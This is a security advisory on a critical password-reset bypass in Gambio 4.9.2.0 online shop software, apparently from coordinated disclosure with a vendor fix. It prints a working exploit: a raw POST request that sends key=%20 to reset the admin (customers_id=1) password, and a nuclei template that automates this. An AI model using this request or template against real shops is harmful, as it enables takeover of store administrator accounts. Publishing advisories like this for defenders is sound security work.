usd-2024-0002 | Gambio 4.9.2.0 - Account Takeover

Product: Gambio
Affected Version: 4.9.2.0 (with Security Update 2024-01 v1.0)
Vulnerability Type: Weak Password Recovery Mechanism for Forgotten Password (CWE-640)
Security Risk: Critical
Vendor URL: https://www.gambio.de/
Vendor Status: Fixed
CVE number: Pending

Description

Gambio is a software program that is specifically designed for running online shops.
It provides various features and tools to help businesses manage their inventory, process orders, and handle customer interactions.

According to their homepage, the software is used by more then 25.000 shops.

The password reset functionality checks for the existence of a password recovery token.
However, this check can be bypassed with a space character ("%20").

Proof of Concept

The password reset functionality utilizes the password_double_opt.php file with multiple possible actions defined in the "action" parameter.
The file loads the PasswordDoubleOptContentControl.inc.php file and executes the proceed method.

If the action is set to save_password, a database query is performed to fetch the customer specified in the POST parameter customers_id with the reset token defined in the key parameter.
Attackers can submit the customers_id as an integer, where the initial admin account usually has the id set to "1".

In line 138 of the PasswordDoubleOptContentControl.inc.php file, the application checks if the previous database query returns results, or if the key is an empty string.

[...]
if (!xtc_db_num_rows($check_customer_query) || $this->v_data_array['POST']['key'] == "")
{
$case = 'no_account';}
else
{
$newpass = $this->v_data_array['POST']['newPassword'];
[...]

The If-Statement shown in line 1 of the snippet above, can be bypassed to return "false", by submitting a space character ("%20") as the key.
The password provided in the request is set without knowing the key to the customer defined in customers_id.

An example request is shown below:

POST /password_double_opt.php?action=save_password HTTP/1.1
Host: localhost[...]

newPassword=changeme2&confirmedPassword=changeme2&customers_id=1&key=%20

A nuclei template was created to test for the vulnerability:

id: gambio-account-takeover
info:
name: Account Takeover in Gambio
description: Account Takeover in Gambio
tags: gambio,php,intrusive
author: ChristianPoeschl,EdwinHoffmann
severity: critical
variables:
customerid: 1
password: "somethingreallylong123"
http:
- raw:
- |
POST /password_double_opt.php?action=save_password HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
newPassword={{password}}&confirmedPassword={{password}}&customers_id={{customerid}}&key=%20
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- "GXsid_"

Fix

The password reset token should be properly validated.

References

https://www.gambio.de

Timeline

2024-01-17: Vulnerability identified by Christian Poeschl and Edwin Hoffmann.
2024-01-26: First contact request via email to info@gambio.de .
2024-01-26: Received an update by Gambio that the incident is in internal review and will be fixed in an upcoming release.
2024-02-14: Gambio 4.9.2.1 fixes this issue.
2024-04-24: This advisory is published.

Credits

This security vulnerability was identified by Christian Poeschl, Edwin Hoffmann of usd AG.